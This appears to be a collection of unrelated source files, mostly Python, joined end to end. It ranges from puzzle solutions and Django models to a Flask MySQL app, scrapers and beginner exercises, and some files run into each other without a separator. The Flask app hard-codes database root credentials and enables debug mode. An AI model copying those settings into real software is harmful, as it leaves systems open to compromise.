        time.sleep(2)
        user.send_keys("prem")
        time.sleep(2)
        passw.send_keys("12345")
        time.sleep(2)
        driver.find_element_by_name("Submit").click()
        time.sleep(2)
        # then attempt a login (deliberately with a wrong password "12")
        driver.get("http://localhost:8085/login")
        user = driver.find_element_by_name("username")
        user.send_keys("prem")
        time.sleep(2)
        passw = driver.find_element_by_name("password")
        passw.send_keys("12")
        time.sleep(2)
        driver.find_element_by_name("Submit").click()
        time.sleep(2)
        driver.quit()
# run the demo only when executed as a script
if __name__ == '__main__':
    c = Conditional()
    c.conditional()
|
import numpy as np
from collections import defaultdict
from itertools import groupby
def find_nth_vaporized(asteroids, position, n):
    """Return position of the nth asteroid to be vaporized.

    The laser starts pointing up and sweeps clockwise, destroying the
    closest remaining asteroid in each angle group per step. Assumes
    1 <= n <= number of asteroids (excluding `position`); the original
    caller guarantees this.
    """
    groups = group_by_angle(asteroids, position)
    vaporized = 0
    i = 0
    while True:
        if groups[i]:
            vaporized += 1
            if vaporized == n:
                return groups[i].pop(0)
            groups[i].pop(0)
        # BUG FIX: the original exited its loop after n-1 deletions and then
        # unconditionally returned groups[i].pop(0); if that group had
        # already been emptied on an earlier revolution this raised
        # IndexError instead of skipping to the next non-empty group.
        i = (i + 1) % len(groups)


def find_best_position(asteroids):
    """Return position and count for asteroid with highest visibility."""
    # number of distinct angle groups == number of visible asteroids
    counts = {a: len(group_by_angle(asteroids, a)) for a in asteroids}
    best = max(counts, key=counts.get)
    return best, counts[best]


def group_by_angle(asteroids, position):
    """Return asteroids grouped by angle, then sorted by distance from position.

    Angle refers to the clockwise angle of the position-asteroid-vector
    relative to the vector that goes straigt upwards, i.e. (0, -1).

    Example:
    >>> group_by_angle(set([(2, 0), (1, 0), (0, 1)]), (0, 0))
    [[(1, 0), (2, 0)], [(0, 1)]]
    """
    def angle(asteroid):
        diff = np.subtract(asteroid, position)
        # arctan2 of the negated vector measured against "up", mapped to
        # a clockwise angle in [0, 360)
        return (360 - np.rad2deg(np.arctan2(*-diff))) % 360

    def dist(asteroid):
        diff = np.subtract(asteroid, position)
        return np.linalg.norm(diff)

    asteroids = [a for a in asteroids if a != position]
    # sort by (angle, distance) so groupby yields distance-sorted groups
    asteroids.sort(key=lambda a: (angle(a), dist(a)))
    return [list(group) for _, group in groupby(asteroids, angle)]
def parse_input(asteroids):
    """Return a set of positions of all asteroids.

    '#' marks an asteroid; positions are (column, row) pairs.
    """
    rows = asteroids.strip().split('\n')
    return {
        (col, row)
        for row, line in enumerate(rows)
        for col, symbol in enumerate(line.strip())
        if symbol == '#'
    }
|
from flask import Flask, render_template, request, redirect, url_for
import mysql.connector
from mysql.connector import cursor
# Module-level DB connection, shared by all request handlers.
# NOTE(review): credentials are hard-coded — move to environment/config
# before deploying.
connection = mysql.connector.connect(
    host="localhost", database="Company", user="root", password="Pass@123"
)
app = Flask(__name__)
@app.route("/home")
def home():
    """List all users on the home page."""
    # NOTE(review): the cursor is never closed here — confirm whether
    # mysql.connector buffering makes that acceptable for this app.
    con = connection.cursor()
    sql = "select * from users"
    con.execute(sql)
    result = con.fetchall()
    return render_template("home.html", datas=result)
@app.route("/addusers", methods=["GET", "POST"])
def addusers():
    """GET: show the add-user form; POST: insert the submitted user."""
    if request.method == "POST":
        name = request.form["name"]
        phno = request.form["phno"]
        address = request.form["address"]
        bday = request.form["bday"]
        gender = request.form["gender"]
        qualification = request.form["qualification"]
        extraqualifi = request.form["extraqualifi"]
        mycur = connection.cursor()
        # parameterized insert — values are bound, not interpolated
        sql = "insert into users(name,phno,address,bday,gender,qualification,extraqualifi) values (%s,%s,%s,%s,%s,%s,%s)"
        record = (name, phno, address, bday, gender, qualification, extraqualifi)
        mycur.execute(sql, record)
        connection.commit()
        # mycur.close()
        return redirect(url_for("home"))
    return render_template("addusers.html")
@app.route("/editUsers/<string:id>", methods=["POST", "GET"])
def editUsers(id):
    """Render the edit form pre-filled with the user identified by `id`."""
    con = connection.cursor()
    con.execute("SELECT * FROM users WHERE id=%s", [id])
    res = con.fetchone()
    return render_template("editUsers.html", datas=res)
@app.route("/update", methods=["GET", "POST"])
def update():
    """Apply the submitted edit form to the matching users row."""
    con = connection.cursor()
    if request.method == "POST":
        id = request.form["id"]
        name = request.form["name"]
        phno = request.form["phno"]
        address = request.form["address"]
        bday = request.form["bday"]
        gender = request.form["gender"]
        qualification = request.form["qualification"]
        extraqualifi = request.form["extraqualifi"]
        # parameterized update keyed on the hidden id field
        sql = "update users set name=%s,phno=%s,address=%s,bday=%s,gender=%s,qualification=%s,extraqualifi=%s where id= %s"
        con.execute(
            sql, [name, phno, address, bday, gender, qualification, extraqualifi, id]
        )
        connection.commit()
    # NOTE(review): a GET request falls through to this redirect without
    # doing anything — confirm that is the intended behavior.
    return redirect(url_for("home"))
@app.route("/deleteUser/<string:id>", methods=["GET", "POST"])
def deleteUser(id):
    """Delete the users row with the given id, then return to the list."""
    con = connection.cursor()
    sql = "delete from users where id= %s"
    con.execute(sql, [id])
    connection.commit()
    con.close()
    return redirect(url_for("home"))
if __name__ == "__main__":
    # development server only; debug=True must not be used in production
    app.run(debug=True)
|
import re
from typing import Iterator, Tuple

from runrex.main import process
from runrex.schema import validate_config

from anaphylaxis_nlp.algo.epinephrine import get_epinephrine
from anaphylaxis_nlp.algo.observation import get_observation
from anaphylaxis_nlp.algo.primary_dx import get_anaphylaxis_dx
from anaphylaxis_nlp.algo.sudden import get_suddenness
def main(config_file):
    """Validate the runrex config and run all anaphylaxis algorithms.

    config_file: path to a json/yaml/py configuration accepted by
    runrex.schema.validate_config.
    """
    conf = validate_config(config_file)
    # algorithm name -> callable, passed through to runrex's processor
    algorithms = {
        'dx': get_anaphylaxis_dx,
        'sudden': get_suddenness,
        'epinephrine': get_epinephrine,
        'observation': get_observation,
    }
    # ssplit (defined below) supplies sentence segmentation with offsets
    process(**conf, algorithms=algorithms, ssplit=ssplit)
def subsplit(sentence: str, start: int, pattern) -> Iterator[Tuple[str, int, int]]:
    """Yield (fragment, begin, end) pieces of *sentence* split at *pattern* matches.

    Offsets are absolute: *start* is the position of *sentence* within the
    original document. Each match opens a new fragment, so the matched
    character stays at the head of the following fragment.

    FIX: the return annotation was Tuple[str, int, int] in the original,
    but this is a generator of such tuples — annotated as Iterator now.
    """
    curr_start = 0
    for sm in pattern.finditer(sentence):
        yield sentence[curr_start: sm.start()], start + curr_start, start + sm.start()
        curr_start = sm.start()
    yield sentence[curr_start:], start + curr_start, start + len(sentence)


def ssplit(text: str) -> Iterator[Tuple[str, int, int]]:
    """Sentence-split *text*, yielding (sentence, begin, end) offset triples.

    Newlines are first joined into spaces. A sentence boundary is a
    whitespace character preceded by '.', '?', '!' or '*' (with negative
    look-behinds to avoid splitting inside abbreviations like "e.g." or
    "Mr."); each sentence is further split on bullet characters via
    subsplit().
    """
    text = ' '.join(text.split('\n'))  # join broken lines
    sub_pat = re.compile(r'[*•-]')
    start = 0
    for m in re.finditer(r'(?<!\w\.\w.)(?<![A-Z][a-z]\.)(?<=\.|\?|\!|\*)\s', text):
        yield from subsplit(text[start: m.start()], start, sub_pat)
        start = m.start()
    yield from subsplit(text[start:], start, sub_pat)
if __name__ == '__main__':
    import sys
    try:
        main(sys.argv[1])
    except IndexError:
        # IndexError means sys.argv[1] (the config path) was not supplied
        raise AttributeError('Missing configuration file: Usage: run.py file.(json|yaml|py)')
|
# Generated by Django 2.1.5 on 2020-07-08 18:29
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial auto-generated migration: creates Brand, Car and Model tables
    and links Car -> Model -> Brand with cascading foreign keys."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Brand',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=20)),
            ],
        ),
        migrations.CreateModel(
            name='Car',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('release_year', models.IntegerField()),
                # transmission choices: 1=manual, 2=automatic, 3=robotized
                ('transmission', models.SmallIntegerField(choices=[(1, 'механика'), (2, 'автомат'), (3, 'робот')])),
                ('color', models.CharField(max_length=30)),
            ],
        ),
        migrations.CreateModel(
            name='Model',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=20)),
                ('brand', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='common.Brand')),
            ],
        ),
        # Car.model is added after Model exists to satisfy creation order
        migrations.AddField(
            model_name='car',
            name='model',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='common.Model'),
        ),
    ]
|
from bs4 import BeautifulSoup
import glob
import os
from fpdf import FPDF
# ---- Build a QC PDF from fMRIprep PNG figures (session 1) ----
# NOTE(review): `htmls` and `svgpath` are collected but never used below;
# BeautifulSoup is imported at the top but also unused — confirm whether
# this script was trimmed down from a larger one.
fpath = "/projects/niblab/bids_projects/Experiments/BBx/fmriprep/ses-1/sub-*/fmriprep/sub*.html"
htmls = glob.glob(fpath)
svgpath = "/projects/niblab/bids_projects/Experiments/BBx/fmriprep/ses-1/sub-*/fmriprep/sub-*/figures/*rois.svg"
pngpath = "/projects/niblab/bids_projects/Experiments/BBx/derivatives/pngs"
os.chdir(pngpath)
pngs= glob.glob("*.png")
# map subject id -> list of that subject's PNG filenames
png_dict = { }
for image in pngs:
    print("IMAGE: ", image)
    # filenames are underscore-delimited; the first token is the subject id
    sub = image.split("_")[0]
    #print(sub, task, run)
    if sub not in png_dict:
        print("----------> MAKING DICTIONARY")
        png_dict[sub] = []
        png_dict[sub].append(image)
        #png_dict[sub]["PNGS"] = image
    else:
        png_dict[sub].append(image)
    print("#######%s DICTIONARY SUB: %s###########" %(sub, png_dict[sub]))
outpath = "/projects/niblab/bids_projects/Experiments/BBx/derivatives/pdfs"
os.chdir(outpath)
pdf = FPDF()
titlepage = "BBx Quality Check \nPart 1: fMRIprep preprocessing \nSession 1"
pdf.set_title("BBx Session 1 QC Part A")
pdf.add_page()
pdf.set_font('Arial', 'B', 15)
pdf.multi_cell(0,20, titlepage, 0, 0, 'C' )
# one page per image, sorted within each subject
for sub in png_dict:
    print("UNSORTED DICTIONARY -----------> %s"%png_dict[sub])
    png_dict[sub] = sorted(png_dict[sub])
    print("SORTED DICTIONARY -----------> %s"%png_dict[sub])
    for image in png_dict[sub]:
        fullimg = pngpath+"/"+image
        print("-------------------------> WRITING TO PDF")
        print("FULL IMAGE PATH ------> %s"%(fullimg))
        # expected filename layout: sub-XX_<?>_task-YY[_run-ZZ]_...
        task = image.split("_")[2]
        taskid = task.split('-')[1]
        id = sub.split('-')[1]
        print("----> IS RESTING? ")
        if 'resting' not in task:
            print("-------------> NOT")
            run = image.split("_")[3]
            runid = run.split('-')[1]
        else:
            print("--------------> TRUE")
            # resting-state images have no run token; header prints "None"
            run = None
            runid = None
        lineA = "SUBJECT: %s || TASK: %s || RUN: %s || \nFILENAME: %s "%(id, taskid, runid, image)
        print("LINE A : %s "%(lineA))
        pdf.add_page()
        pdf.image(fullimg, 5,50, 200)
        pdf.set_font('Arial', 'B', 15)
        pdf.multi_cell(0, 20, lineA, 0, 0)
pdf.output("yourfile.pdf", "F")
|
from django.contrib.auth.models import User
from django.test import TestCase
from ..models import Task, Preferences
class TaskModelTests(TestCase):
    """Field-metadata tests for the Task model (verbose names, max lengths).

    FIX: assertEquals is a long-deprecated alias of assertEqual (removed in
    Python 3.12); all assertions now use assertEqual.
    """

    @classmethod
    def setUpTestData(cls):
        # one user shared by every test in this class
        User.objects.create_user(username='tom', email='tom@dummy.com', password='asdf1234')

    def setUp(self):
        self.client.login(username='tom', password='asdf1234')
        user = User.objects.first()
        Task.objects.create(
            name='another task', description='testing page', issued_by=user)

    def test_field_label_name(self):
        task = Task.objects.first()
        field_label = task._meta.get_field('name').verbose_name
        self.assertEqual(field_label, 'name')

    def test_field_label_description(self):
        task = Task.objects.first()
        field_label = task._meta.get_field('description').verbose_name
        self.assertEqual(field_label, 'description')

    def test_field_label_issued_by(self):
        task = Task.objects.first()
        field_label = task._meta.get_field('issued_by').verbose_name
        self.assertEqual(field_label, 'issued by')

    def test_field_label_done(self):
        task = Task.objects.first()
        field_label = task._meta.get_field('done').verbose_name
        self.assertEqual(field_label, 'done')

    def test_field_label_done_by(self):
        task = Task.objects.first()
        field_label = task._meta.get_field('done_by').verbose_name
        self.assertEqual(field_label, 'done by')

    def test_field_label_name_max_length(self):
        task = Task.objects.first()
        field_length = task._meta.get_field('name').max_length
        self.assertEqual(field_length, 40)

    def test_field_label_description_max_length(self):
        task = Task.objects.first()
        field_length = task._meta.get_field('description').max_length
        self.assertEqual(field_length, 4000)
class PreferencesModelTests(TestCase):
    """Field-metadata tests for the Preferences model.

    FIX: assertEquals (deprecated alias, removed in Python 3.12) replaced
    with assertEqual; the unused `user` local in setUpTestData removed.

    NOTE(review): no Preferences object is created here, so these tests
    assume one is auto-created for the user (e.g. via a post_save signal);
    otherwise Preferences.objects.first() is None — confirm.
    """

    @classmethod
    def setUpTestData(cls):
        User.objects.create_user(username='tom', email='tom@dummy.com', password='asdf1234')

    def test_field_label_user(self):
        preferences = Preferences.objects.first()
        field_label = preferences._meta.get_field('user').verbose_name
        self.assertEqual(field_label, 'user')

    def test_field_label_show_all(self):
        preferences = Preferences.objects.first()
        field_label = preferences._meta.get_field('show_all').verbose_name
        self.assertEqual(field_label, 'show all')
|
from collections import Counter
class Pattern(object):
    """A rectangular fabric claim expanded into its covered (x, y) cells."""

    def __init__(self, index, x, y, dx, dy):
        self.index = index
        # every cell covered by the dx-by-dy rectangle anchored at (x, y)
        self.pos_tuples = [
            (xi, yi)
            for xi in range(x, x + dx)
            for yi in range(y, y + dy)
        ]

    def all_pos_unique(self, pos_counter):
        """True if no cell of this claim is shared with any other claim."""
        return all(pos_counter[pos] == 1 for pos in self.pos_tuples)


def parse_patterns(lines):
    """Parse '#id @ x,y: WxH' claim lines into Pattern objects."""
    #TODO switch to RE
    patterns = []
    for line in lines:
        tokens = line.split()
        claim_id = tokens[0][1:]              # strip the leading '#'
        x, y = (int(s) for s in tokens[2][:-1].split(','))   # drop trailing ':'
        dx, dy = (int(s) for s in tokens[3].split('x'))
        patterns.append(Pattern(claim_id, x, y, dx, dy))
    return patterns


def get_pos_counter(patterns):
    """Count how many claims cover each fabric cell."""
    pos_counter = Counter()
    for pat in patterns:
        pos_counter.update(pat.pos_tuples)
    return pos_counter


def part1(patterns):
    """Number of cells covered by two or more claims."""
    pos_counter = get_pos_counter(patterns)
    return sum(1 for count in pos_counter.values() if count >= 2)


def part2(patterns):
    """Index (as a string) of the single claim that overlaps nothing."""
    pos_counter = get_pos_counter(patterns)
    for pat in patterns:
        if pat.all_pos_unique(pos_counter):
            return pat.index
def main():
    """Read input.txt and print the answers to both puzzle parts."""
    f = open('input.txt', 'r')
    lines = f.readlines()
    f.close()
    patterns = parse_patterns(lines)
    print(part1(patterns))
    print(part2(patterns))

if __name__ == '__main__':
    main()
|
import logging
import requests
from bs4 import BeautifulSoup
css_url = "https://chicagosocial.com/sports/indoor-volleyball/"
def parse_css(content):
    """Scrape Chicago Sports & Social volleyball league rows from HTML.

    content: raw HTML bytes/str. Returns a list of dicts with the league's
    day/location/gender/skill/format/time/date/price columns. Rows that do
    not match the expected column layout are logged and skipped.
    """
    schedules = []
    # NOTE(review): `league` is assigned but never used below — confirm
    # whether it was meant to be included in each schedule dict.
    league = "Chicago Sports and Social"
    soup = BeautifulSoup(content, "html.parser")
    # desktop-only table rows carry the league data
    rows = soup.select(".hide-on-mobile.league-row")
    for row in rows:
        try:
            cols = row.select("td")
            # positional column mapping; cols[0] is skipped (layout cell)
            day = cols[1].text.strip()
            location = cols[2].text.strip()
            gender = cols[3].text.strip()
            skill = cols[4].text.strip()
            fmt = cols[5].text.strip()
            time = cols[6].text.strip()
            start_date = cols[7].text.strip()
            team_price = cols[8].text.strip()
            solo_price = cols[9].text.strip()
            schedules.append({
                'day': day,
                'location': location,
                'gender': gender,
                'skill': skill,
                'fmt': fmt,
                'time': time,
                'start_date': start_date,
                'team_price': team_price,
                'solo_price': solo_price
            })
        except Exception as e:
            # best-effort scrape: log malformed rows and continue
            logging.error(str(e))
    return schedules
# Fetch the live page and print each parsed schedule row.
url = "https://chicagosocial.com/sports/indoor-volleyball/"
r = requests.get(url)
s = parse_css(r.content)
for sch in s:
    print(sch)
|
from django.urls import path
from .views import (
SearchProductView,
fluid_search,
)
# URL routes for the search app: the class-based search page plus an
# AJAX endpoint for as-you-type results.
urlpatterns = [
    path('', SearchProductView.as_view(), name='query'),
    path('ajax-search/', fluid_search, name='fluid-search')
    # path('<slug>/', ProductDetailViewSlug.as_view(), name='details'),
]
"""
Test to make sure specifying that modules have a shared mycontext
"""
import repyhelper
import test_utils
TESTFILE1 = "rhtest_mycontext_shared1.r2py"
TESTFILE2 = "rhtest_mycontext_shared2.r2py"

# start from a clean slate, then translate both repy modules with a
# shared mycontext so they see the same dictionary
test_utils.cleanup_translations([TESTFILE1, TESTFILE2])

modname1 = repyhelper.translate(TESTFILE1, shared_mycontext=True)
mod1 = __import__(modname1)
reload(mod1)
modname2 = repyhelper.translate(TESTFILE2, shared_mycontext=True)
mod2 = __import__(modname2)
reload(mod2)

# mod1 presumably stores 'bar' into the shared mycontext and mod2.foo()
# reads it back — TODO confirm against the .r2py fixtures
result = mod2.foo()
if result == 'bar':
    pass
else:
    print "Context sharing failed! foo returned", mod2.foo()
    print "mod1's mycontext =", mod1.mycontext
    print "mod2's mycontext =", mod2.mycontext

# remove the generated translation files again
test_utils.cleanup_translations([TESTFILE1, TESTFILE2])
|
# have a help command
# have a show command
# Make a list to hold on Items
# Make a list to hold on Items
shopping_list = []


def show_help():
    """Print usage instructions for the shopping-list prompt.

    FIX: corrected user-facing typos ("instreuction"/"shoud" -> "should").
    """
    print("What should we pick up from store? ")
    print("""
Enter 'DONE' to stop adding items.
Enter 'HELP' for this help.
Enter 'SHOW' to see your list
""")

show_help()


# print out the list
def show_list():
    """Print every item currently on the shopping list."""
    # FIX: capitalized "here" in the user-facing message
    print("Here is your list:")
    for item in shopping_list:
        print(item)


def add_to_list(item):
    """Append *item* to the shopping list and report the new length."""
    shopping_list.append(item)
    # FIX: corrected typo "Addded" -> "Added"
    print("Added {}. List now has {} items".format(item, len(shopping_list)))
# Interactive loop: keep collecting items until the user types DONE;
# HELP and SHOW are handled without adding to the list.
while True:
    # ask for new item
    new_item = input("> ")
    # be able to quit the app
    if(new_item.upper() == "DONE"):
        break
    elif new_item.lower() == "help":
        show_help()
        continue
    elif new_item.lower() == "show":
        show_list()
        continue
    add_to_list(new_item)

# final state of the list on exit
show_list()
|
#coding: utf-8
"""
@Author: Well
@Date: 2013-01-26
"""
# Exercise 13: parameters, unpacking, variables (Python 2)
# Unpack the four expected command-line values: the script name plus
# three test arguments; fewer/more arguments raise ValueError.
from sys import argv
# noinspection PyPep8,PyPep8,PyPep8
my_argv_script, my_argv_test1, my_argv_test2, my_argv_test3 = argv
# noinspection PyPep8
print "script", my_argv_script
# noinspection PyPep8
print "test1", my_argv_test1
# noinspection PyPep8
print "test2", my_argv_test2
print "test3", my_argv_test3
-X FMLP -Q 0 -L 1 71 300
-X FMLP -Q 0 -L 1 61 400
-X FMLP -Q 0 -L 1 49 150
-X FMLP -Q 1 -L 1 35 125
-X FMLP -Q 1 -L 1 34 175
-X FMLP -Q 1 -L 1 28 150
-X FMLP -Q 2 -L 1 23 100
-X FMLP -Q 2 -L 1 21 250
-X FMLP -Q 2 -L 1 13 125
-X FMLP -Q 3 -L 1 11 125
-X FMLP -Q 3 -L 1 10 100
-X FMLP -Q 3 -L 1 4 250
|
# coding=utf-8
from __future__ import absolute_import, division, print_function
import argparse
import logging
from . import vfp2py
def parse_args(argv=None):
    """Build the vfp2py command-line parser and parse *argv*.

    :param argv: optional argument list; defaults to ``sys.argv[1:]``.
    :return: the parsed :class:`argparse.Namespace`.
    """
    parser = argparse.ArgumentParser(description='Tool for rewriting Foxpro code in Python')
    # Boolean switches share the same shape, so declare them in one place.
    for flag, description in (
            ("--logging", "output logging information"),
            ("--profile", "turn on profiling")):
        parser.add_argument(flag, help=description, action='store_true')
    parser.add_argument("--encoding", help="set file encoding", default="cp1252")
    parser.add_argument(
        "infile", type=str,
        help="file to convert - supported file types are prg, mpr, spr, scx, vcx, or pjx,")
    parser.add_argument(
        "outpath", type=str,
        help="path to output converted code, will be a filename for all but pjx which will be a directory")
    parser.add_argument(
        "search", type=str, nargs='*',
        help="directory to search for included files")
    return parser.parse_args(argv)
def main(argv=None):
    """CLI entry point: parse options, set up logging and search path,
    then convert the input file (optionally under cProfile).

    :param argv: optional argument list forwarded to :func:`parse_args`.
    """
    args = parse_args(argv)
    if args.logging:
        logging.basicConfig(level=logging.DEBUG)
    vfp2py.SEARCH_PATH += args.search
    if args.profile:
        import cProfile
        # Bug fix: the profiling branch previously called convert_file
        # without the --encoding option, so profiled runs decoded the input
        # differently from normal runs.  Pass it through in both paths.
        cProfile.runctx(
            'vfp2py.convert_file(args.infile, args.outpath, encoding=args.encoding)',
            globals(), locals())
    else:
        vfp2py.convert_file(args.infile, args.outpath, encoding=args.encoding)
if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        # Exit quietly on Ctrl-C instead of printing a traceback.
        pass
|
from django.db import models
import datetime
from django.contrib.auth.models import User
from django.db.models.fields import NullBooleanField
from django.db.models.fields.related import OneToOneField
from django.utils.tree import Node
from jsonfield import JSONField
from typing_extensions import runtime
# Create your models here.
class userdata(models.Model):
    # Per-user judge statistics and settings; exactly one row per auth User.
    user = models.OneToOneField(User, on_delete=models.CASCADE, related_name="userdata")
    # Counters for accepted / rejected submissions.
    correct = models.IntegerField(default=0)
    incorrect = models.IntegerField(default=0)
    runtime = models.IntegerField(default=0)
    timelimit = models.IntegerField(default=0)
    # NOTE(review): a mutable dict as `default` is shared between field
    # instances; Django convention is a callable default — confirm before
    # changing, existing migrations serialize this value.
    tags = JSONField(default={"isnull": True})
    notifications = JSONField(default={"isnull": True})
    def __str__(self):
        return f'{self.user}'
class Contest(models.Model):
    # A timed contest with a many-to-many set of participating users.
    name = models.CharField(max_length=20)
    start_time = models.DateTimeField()
    end_time = models.DateTimeField()
    participants = models.ManyToManyField(User, related_name="contests")
    def __str__(self) -> str:
        return f"{self.name}"
class Blog(models.Model):
    # An announcement/editorial post; each contest has at most one blog.
    author = models.ForeignKey(User, on_delete=models.CASCADE, related_name="blogs")
    name = models.CharField(max_length=20)
    statement = models.TextField()
    contest = OneToOneField(Contest, on_delete=models.CASCADE, related_name="blog")
    # auto_now=True: both stamps update on every save, not only on creation.
    date = models.DateField(auto_now=True)
    timestamp = models.TimeField(auto_now=True)
    def __str__(self):
        return f'{self.name}'
class Tag(models.Model):
    # Free-form label attached to questions (see Question.tags).
    name = models.CharField(max_length=20)
    def __str__(self):
        return f"{self.name}"
class Question(models.Model):
    # A problem belonging to a contest, with limits and optional tags.
    author = models.ForeignKey(User, on_delete=models.CASCADE, related_name="questions")
    name = models.CharField(max_length=10)
    statement = models.TextField()
    tags = models.ManyToManyField(Tag, blank=True, related_name="questions")
    contest = models.ForeignKey(Contest, blank=True, on_delete=models.CASCADE, related_name="questions")
    # Time limit in seconds (fractional allowed), memory limit in MB.
    timelimit = models.DecimalField(max_digits=6, decimal_places=3, default=1)
    memlimit = models.IntegerField(default=128)
    def __str__(self):
        return f"{self.name}"
class Testcase(models.Model):
    # One input/expected-output pair for a question.
    question = models.ForeignKey(Question, on_delete=models.CASCADE, related_name="testcases")
    testcase = models.TextField()
    answer = models.TextField()
    def __str__(self):
        return f'{self.question.name}'
class Submission(models.Model):
    # A user's submitted solution; verdict starts as "Queued..." until judged.
    user = models.ForeignKey(User, on_delete=models.CASCADE, related_name="submissions")
    ques = models.ForeignKey(Question, on_delete=models.CASCADE, related_name="submissions")
    code = models.TextField()
    lang = models.CharField(max_length=10)
    verdict = models.CharField(max_length=50, default="Queued...")
    def __str__(self):
        return f'{self.user} ----> {self.ques}'
import meinheld_zeromq as zmq
import meinheld.server
import greenlet
# Shared ZeroMQ context and a handle to the main greenlet so helpers can
# switch control back to it.
ctx = zmq.Context()
main_greenlet = greenlet.getcurrent()
def sleep(secs):
    # Cooperative sleep: schedule a switch back to the current greenlet
    # after `secs` seconds, then hand control to the main greenlet.
    meinheld.schedule_call(secs, greenlet.getcurrent().switch)
    main_greenlet.switch()
def pingpong():
    # Background loop (Python 2): once a second send b'hello' over a REQ
    # socket to the peer on port 10000 and print the reply.
    sock = ctx.socket(zmq.REQ)
    sock.connect('tcp://127.0.0.1:10000')
    while True:
        sleep(1)
        sock.send(b'hello')
        print sock.recv()
def dummy_app(env, start):
    """WSGI app: forward PATH_INFO over a REQ socket and echo the reply."""
    req = ctx.socket(zmq.REQ)
    req.connect('tcp://127.0.0.1:10000')
    req.send(env['PATH_INFO'])
    reply = req.recv()
    headers = [('Content-Type', 'text/plain'),
               ('Content-Length', str(len(reply)))]
    start("200 OK", headers)
    return [reply]
# Spawn the background ping loop, then serve the WSGI app on port 10001
# (both REQ sockets above talk to a peer on port 10000).
meinheld.spawn(pingpong)
meinheld.listen(("127.0.0.1", 10001))
meinheld.run(dummy_app)
|
import argparse
import csv
import torch
import transformers
def parse_arguments():
    """Parse the command line for the embedding script.

    :return: an ``argparse.Namespace`` whose single attribute ``papers`` is
        the path of the CSV file to embed (read from ``sys.argv``).
    """
    cli = argparse.ArgumentParser(description="MiniConf Portal Command Line")
    cli.add_argument("papers", default=False, help="papers file to parse")
    return cli.parse_args()
if __name__ == "__main__":
args = parse_arguments()
tokenizer = transformers.AutoTokenizer.from_pretrained("deepset/sentence_bert")
model = transformers.AutoModel.from_pretrained("deepset/sentence_bert")
model.eval()
with open(args.papers, "r") as f:
abstracts = list(csv.DictReader(f))
all_abstracts = torch.zeros(len(abstracts), 768)
with torch.no_grad():
for i, row in enumerate(abstracts):
input_ids = torch.tensor([tokenizer.encode(row["abstract"])[:512]])
all_hidden_states, _ = model(input_ids)[-2:]
all_abstracts[i] = all_hidden_states.mean(0).mean(0)
print(i)
torch.save(all_abstracts, "embeddings.torch")
|
# Redo challenge 035 (triangles), additionally reporting which kind of
# triangle the three segments form:
# EQUILATERAL: all sides equal
# ISOSCELES: exactly 2 sides equal
# SCALENE: all sides different
retaA = float(input("Digite o comprimento da primeira reta: "))
retaB = float(input("Digite o comprimento da segunda reta: "))
retaC = float(input("Digite o comprimento da terceira reta: "))
formaTrianguloA = False
formaTrianguloB = False
formaTrianguloC = False
# Triangle inequality, checked from the perspective of each side.
if abs(retaB - retaC) < retaA < (retaB + retaC):
    formaTrianguloA = True
if abs(retaA - retaC) < retaB < (retaA + retaC):
    formaTrianguloB = True
if abs(retaA - retaB) < retaC < (retaA + retaB):
    formaTrianguloC = True
if formaTrianguloA and formaTrianguloB and formaTrianguloC == True:
    # Classify: all equal -> equilateral, any pair equal -> isosceles,
    # otherwise scalene.
    if retaA == retaB and retaB == retaC:
        print("Estes 3 segmentos podem formar um triângulo")
        print("O tipo de trinângulo formado é: EQUILÁTERO")
    elif retaA == retaB or retaB == retaC or retaA == retaC:
        print("Estes 3 segmentos podem formar um triângulo")
        print("O tipo de trinângulo formado é: ISÓSCELES")
    else:
        print("Estes 3 segmentos podem formar um triângulo")
        print("O tipo de trinângulo formado é: ESCALENO")
else:
    print("Estes 3 segmentos NÃO podem formar um triângulo")
import numpy as np
class P_controller:
    """Proportional level controller for one tank.

    The gain ``Kc`` is derived from the tank geometry (``k``, ``tau1``)
    and the tuning constant ``TAU_C``; actions are re-evaluated only every
    ``ACTION_DELAY`` calls and clamped to the valve range [0, 1].
    """

    def __init__(self, environment, AGENT_PARAMS, i):
        # Nominal valve opening and the level set point for tank i.
        self.z_nom = AGENT_PARAMS["INIT_POSITION"]
        self.tank = environment.tanks[i]
        self.h_set = AGENT_PARAMS["SS_POSITION"] * environment.tanks[i].h
        # Process gain and time constant from the tank's geometry.
        self.k = self.tank.init_l / self.z_nom
        self.tau1 = (np.pi * self.tank.r) / (
            self.tank.init_l * self.tank.A_pipe * 2 * 9.81
        )
        self.tau_c = AGENT_PARAMS["TAU_C"]
        self.evalv_kc(self.tau_c)
        self.action_deley = AGENT_PARAMS["ACTION_DELAY"]
        self.action = AGENT_PARAMS["INIT_POSITION"]
        # Large initial buffer forces a fresh action on the first call.
        self.action_buffer = 99999

    def get_z(self, h):
        """Return the valve position for the measured level *h*."""
        if self.action_buffer <= self.action_deley:
            # Still inside the actuation-delay window: hold the last action.
            self.action_buffer += 1
            return self.action
        deviation = h - self.h_set
        proposed = deviation * self.Kc + self.z_nom
        # Clamp to the physical valve range [0, 1].
        self.action = max(0, min(1, proposed))
        self.action_buffer = 0
        return self.action

    def evalv_kc(self, tau_c):
        """Recompute the proportional gain Kc = k / (tau1 * tau_c)."""
        self.Kc = self.k / (self.tau1 * tau_c)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-04-12 09:47
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated schema migration (Django 1.11): adds the MovieInfo and
    # MovieLangPack tables and links Video to EpisodeInfo.  Generated files
    # should not be edited by hand beyond conflict resolution.
    dependencies = [
        ('cms_test2', '0006_auto_20180412_0942'),
    ]
    operations = [
        migrations.CreateModel(
            name='MovieInfo',
            fields=[
                ('movie_info_id', models.AutoField(primary_key=True, serialize=False)),
            ],
        ),
        migrations.CreateModel(
            name='MovieLangPack',
            fields=[
